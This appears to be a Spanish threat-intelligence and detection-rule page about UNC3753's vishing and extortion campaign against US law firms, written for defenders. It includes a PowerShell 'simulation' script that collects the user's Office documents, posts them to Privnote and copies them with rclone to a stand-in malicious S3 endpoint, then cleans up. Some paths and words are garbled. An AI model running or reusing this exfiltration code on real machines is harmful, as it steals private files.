Buscando Asesoramiento: Ataques Dirigidos Ongoing Contra Firmas de Abogados en EE.UU.
Seguir 
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
Un grupo de amenazas motivado financieramente, rastreado como UNC3753, está llevando a cabo campañas de vishing que engañan a las víctimas para que instalen software de monitoreo y gestión remota. Una vez establecido el acceso, los actores roban información legal y financiera sensible y luego extorsionan a la organización víctima amenazando con la exposición pública. La campaña se centra en empresas de servicios profesionales de EE.UU., particularmente bufetes de abogados, y puede implicar tanto el robo de datos habilitado por cibertecnología como el físico.
Investigación
Mandiant observó el ciclo completo de intrusión, desde la llamada inicial de vishing hasta el robo de datos y la extorsión, a veces dentro de un solo día hábil. Las víctimas fueron convencidas para usar herramientas de compartir pantalla y software RMM como AnyDesk, Bomgar o un instalador SuperOps personalizado entregado con un comando curl. La exfiltración de datos se llevó a cabo utilizando herramientas como WinSCP, Rclone, o subidas directas a cuentas de almacenamiento en la nube de consumidores.
Mitigación
Las organizaciones deben capacitar al personal para reconocer intentos de vishing, aplicar procedimientos de verificación estrictos para cualquier solicitud de soporte remoto y bloquear herramientas no autorizadas de RMM y compartir pantalla. Deshabilitar medios extraíbles, monitorear transferencias de salida inusuales a almacenamiento en la nube o destinos FTP, aplicar controles de acceso condicional a VDI, y aplicar MFA en repositorios críticos de documentos puede reducir aún más el riesgo.
Respuesta
Si se detecta esta actividad, aisle inmediatamente el punto final afectado, termine cualquier sesión remota no autorizada, y elimine los binarios de RMM instalados. Los investigadores deben recopilar el historial de línea de comandos, cambios en el registro y artefactos de tareas programadas para revisión forense. Las credenciales comprometidas deben ser restablecidas, la exfiltración de datos debe ser evaluada, y considerar el compromiso con las fuerzas del orden si la extorsión ha comenzado.
"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef technique fill:#ccccff classDef operator fill:#ff9900 %% Node definitions initial_access["<b>Acción</b> – <b>T1566.004 Phishing: Spearphishing Voice</b><br/><b>Descripción</b>: El atacante usa una llamada de voz convincente para engañar al objetivo y proporcionarle credenciales o ejecutar comandos maliciosos."] class initial_access action user_execution["<b>Acción</b> – <b>T1204.002 Archivo Malicioso</b><br/><b>Herramienta</b>: cURL + Instalador MSI<br/><b>Descripción</b>: La víctima ejecuta un archivo MSI malicioso descargado a través de cURL, lo que resulta en la ejecución de código en el sistema."] class user_execution action remote_desktop["<b>Acción</b> – <b>T1219.002 Software de Escritorio Remoto</b><br/><b>Herramientas</b>: Zoom, Microsoft Teams, AnyDesk<br/><b>Descripción</b>: Se abusan de aplicaciones legítimas de escritorio remoto o de reuniones para mantener un acceso remoto persistente."] class remote_desktop action discovery["<b>Acción</b> – <b>T1083 Descubrimiento de Archivos y Directorios</b> & <b>T1680 Descubrimiento de Almacenamiento Local</b><br/><b>Descripción</b>: El adversario enumera archivos, directorios y ubicaciones de almacenamiento local para localizar datos valiosos para la exfiltración."] class discovery action data_staging["<b>Acción</b> – <b>T1074 Datos Preparados</b> & <b>T1560 Archivar Datos Colectados</b><br/><b>Descripción</b>: Los archivos recopilados se preparan localmente y se comprimen en archivos para su exfiltración."] class data_staging action exfiltration["<b>Acción</b> – <b>T1567.002 Exfiltración a Almacenamiento en la Nube</b> & <b>T1020 Exfiltración Automatizada</b><br/><b>Objetivo</b>: Google Drive<br/><b>Descripción</b>: Carga automatizada de archivos preparados a un servicio de almacenamiento en la nube para extracción remota."] class exfiltration action physical_media["<b>Acción</b> – <b>T1052 Exfiltración a través de Medio Físico</b><br/><b>Descripción</b>: Transferencia de datos a medios extraíbles para exfiltración offline cuando los canales de red están restringidos."] class physical_media action cleanup["<b>Acción</b> – <b>T1070.001 Limpiar Registros de Eventos de Windows</b><br/><b>Descripción</b>: Eliminación de registros de eventos de Windows para borrar evidencia de la intrusión."] class cleanup action %% Edge connections initial_access –>|lleva_a| user_execution user_execution –>|habilita| remote_desktop remote_desktop –>|habilita| discovery discovery –>|lleva_a| data_staging data_staging –>|habilita| exfiltration exfiltration –>|lleva_a| physical_media physical_media –>|seguido_por| cleanup "
Flujo de Ataque
Detecciones
Software Alternativo de Acceso/ Gestión Remota (vía proceso_creación)
Ver
Uso Sospechoso de CURL (vía línea de comandos)
Ver
Posible Intento de Instalación de Software SuperOps RMM (vía evento_archivo)
Ver
Software Alternativo de Acceso/ Gestión Remota (vía sistema)
Ver
Software Alternativo de Acceso/ Gestión Remota (vía auditoría)
Ver
Posible Intento de Instalación de Software RMM Usando MsiInstaller (vía registros de aplicación)
Ver
IOCs (SourceIP) para detectar: Buscando Consejería: Campaña en Curso Dirigida Contra Firmas de Abogados de EE.UU.
Ver
IOCs (DestinationIP) para detectar: Buscando Consejería: Campaña en Curso Dirigida Contra Firmas de Abogados de EE.UU.
Ver
Detección de Uso No Autorizado de Compartición de Archivos y Tráfico SSH de Alto Volumen [Firewall]
Ver
Exfiltración de Datos por UNC3753 Usando Privnote y Herramientas de Transferencia de Archivos [Conexión de Red de Windows]
Ver
Acceso Remoto de UNC3753 e Instalación Maliciosa de MSI [Creación de Procesos de Windows]
Ver
Ejecución de Simulación
Requisito Previo: La Verificación Previa de Telemetría y Línea de Base debe haber pasado.
Justificación: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTPs identificados y apuntar a generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados llevarán a un mal diagnóstico.
-
Narrativa de Ataque y Comandos:
-
Reconocimiento y Preparación de Datos (T1005, T1083):
El adversario enumera los directorios de usuario y copia todos los*.docxand*.xlsxarchivos a una carpeta de preparaciónC:TempStagedData. -
Subida a través de Privnote (T1567.002):
Usando PowerShell, el atacante lee cada archivo, codifica el contenido en base‑64, y lo publica enhttps://privnote.com/api/note. La línea de comandos incluye la URL, que satisface lacondición de selección_privnote.Transferencia con Rclone (T1020): -
Transfer with Rclone (T1020):
El atacante ejecutarclone.exe(descargado sobre la marcha) para enviar los archivos preparados a un bucket malicioso de S3. El nombre del proceso «rclone.exe» coincide con laherramienta de selección. -
Limpieza: Eliminar la carpeta de preparación y cualquier binario residual.
-
-
Script de Prueba de Regresión: (PowerShell – autónomo, sin dependencias externas más allá de
Invoke-WebRequest.)# ------------------------------------------------- # Simulación de Exfiltración de UNC3753 – PowerShell # ------------------------------------------------- # 1. Preparar directorio de preparación $staging = "$env:USERPROFILETempStagedData" New-Item -ItemType Directory -Force -Path $staging | Out-Null # 2. Copiar datos de muestra (simular recolección de datos) Get-ChildItem -Path "$env:USERPROFILEDocuments" -Include *.docx, *.xlsx -Recurse -ErrorAction SilentlyContinue | ForEach-Object { Copy-Item -Path $_.FullName -Destination $staging -Force } # 3. Cargar cada archivo a Privnote (exfiltración web‑servicio) $privnoteUrl = "https://privnote.com/api/note" Get-ChildItem -Path $staging -File | ForEach-Object { $content = [Convert]::ToBase64String([IO.File]::ReadAllBytes($_.FullName)) $body = @{ text = $content } # La URL aparece en la línea de comando -> activa selección_privnote Invoke-WebRequest -Uri $privnoteUrl -Method POST -Body $body -UseBasicParsing | Out-Null } # 4. Descargar Rclone (si no está presente) y exfiltrar vía S3 $rcloneExe = "$env:TEMPrclone.exe" if (-not (Test-Path $rcloneExe)) { Invoke-WebRequest -Uri "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile "$env:TEMPrclone.zip" Expand-Archive -Path "$env:TEMPrclone.zip" -DestinationPath $env:TEMP -Force Move-Item -Path (Get-ChildItem "$env:TEMPrclone-*-windows-amd64rclone.exe").FullName -Destination $rcloneExe -Force } # Configurar un bucket S3 remoto (malicioso) – la configuración se escribe en un archivo temporal $rcloneConfig = @" [malicioso type = s3 provider = AWS access_key_id = AKIAFAKEKEY secret_access_key = fakeSecretKey123 region = us-east-1 endpoint = https://malicious-s3.example.com "@ $configPath = "$env:TEMPrclone.conf" $rcloneConfig | Set-Content -Path $configPath -Encoding ASCII # Ejecutar rclone copy - el nombre del proceso "rclone.exe" activa herramienta de selección & $rcloneExe copy $staging "malicious:exfil" --config $configPath --log-level INFO # 5. Limpieza Remove-Item -Recurse -Force $staging Remove-Item -Force $rcloneExe, $configPath -
Comandos de Limpieza:
# Terminar cualquier proceso WinSCP o Rclone persistente Get-Process -Name WinSCP, rclone -ErrorAction SilentlyContinue | Stop-Process -Force # Borrar archivos temporales dejados (si los hay) Remove-Item -Path "$env:TEMPWinSCP.exe","$env:TEMPWinSCP.zip","$env:TEMPrclone.zip","$env:TEMPrclone-*-windows-amd64" -Recurse -Force -ErrorAction SilentlyContinue